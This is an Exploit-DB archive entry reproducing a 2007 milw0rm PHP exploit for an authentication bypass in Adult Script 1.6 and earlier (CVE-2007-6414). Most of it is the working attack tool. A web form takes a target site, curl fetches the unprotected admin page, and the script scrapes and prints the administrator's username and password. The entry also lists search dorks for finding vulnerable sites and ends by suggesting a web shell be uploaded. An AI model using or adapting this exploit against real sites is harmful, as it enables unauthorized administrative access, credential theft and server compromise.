Adult Script <= 1.6 Unauthorized Administrative Access Exploit

2007-12-13T00:00:00
ID EDB-ID:4731
Type exploitdb
Reporter Liz0ziM
Modified 2007-12-13T00:00:00

Description

Adult Script <= 1.6 Unauthorized Administrative Access Exploit. CVE-2007-6414. Webapps exploit for php platform

                                        
                                            &lt;? ob_implicit_flush(true); ?&gt;
&lt;title&gt;Adult Script Unauthorized Administrative Access Exploit&lt;/title&gt;
&lt;style&gt;
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}  
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}
a:link {
	color: #999999;
	text-decoration: none;
        font-weight: bold;
	background-color:#000000;
}
a:visited {
	color: #999999;
	text-decoration: none;
        font-weight: bold;
	background-color:#000000;
}
&lt;/style&gt;&lt;br&gt;

&lt;h3&gt;Adult Script Unauthorized Administrative Access Exploit&lt;/h3&gt;&lt;br&gt;
Exploit Coded By Liz0ziM From &lt;a href="http://www.biyofrm.com"&gt;BiyoSecurityTeam&lt;/a&gt;&lt;br&gt;
Greetz My all friend and BiyoSecurityTeam User..
&lt;br&gt;
Software site: http://www.adultscript.net/&lt;br&gt;
Demo: http://www.adultscript.net/demo/&lt;br&gt;

Vulnerable code in &lt;b&gt;admin/administrator.php&lt;/b&gt; near lines 5-8&lt;/b&gt;

&lt;pre&gt;
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me :D
} 
&lt;/pre&gt;
&lt;br&gt;
&lt;b&gt;Dork&lt;/b&gt;:&lt;br&gt;
inurl:submit-user-link.html&lt;br&gt;
inurl:video-listing-cat&lt;br&gt;
inurl:hosted-videos&lt;br&gt;
inurl:porn-listing-cat&lt;br&gt;
"Powered By AdultScript.NET"&lt;br&gt;
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"&lt;br&gt;
&lt;br&gt;
&lt;form method="POST" action=""&gt;
&lt;input name="adres" type="text" value="Target  example: http://www.site.com/" size="70" onFocus="if(this.value=='Target  example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target  example: http://www.site.com/'"&gt;
&lt;input name="yolla" type="submit" value="Send"&gt;
&lt;/form&gt;

&lt;br&gt;
&lt;?php
function dosya_indir($liz0){
		
		
		$ch = curl_init();
		$timeout = 0;
		curl_setopt ($ch, CURLOPT_URL, $liz0);
		curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
		$veri = curl_exec($ch);
		curl_close($ch);
		
		return $veri;

	}

$desen='|value="(.*)"|';

if($_POST[yolla])
{
$adres=$_POST[adres];

if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'BoÅŸ Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."&lt;br&gt;";
sleep(1);
echo 'Sending Evil Code.......&lt;br&gt;';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);

if(eregi('value="',$kaynak)) { 
echo "Exploit Has Been Succeful &lt;br&gt;";
preg_match_all($desen,$kaynak,$sonuc);
echo "&lt;a target='_blank' href='".$adres."/admin/'&gt;".$adres."/admin/&lt;/a&gt;&lt;br&gt;";
echo "&lt;b&gt;Username&lt;/b&gt; :".htmlspecialchars($sonuc[1][0])."&lt;br&gt;";
echo "&lt;b&gt;Password&lt;/b&gt;:".htmlspecialchars($sonuc[1][1])."&lt;br&gt;";
echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
echo "Exploit Has Been Failed! &lt;br&gt;";
}


}
?&gt;

# milw0rm.com [2007-12-13]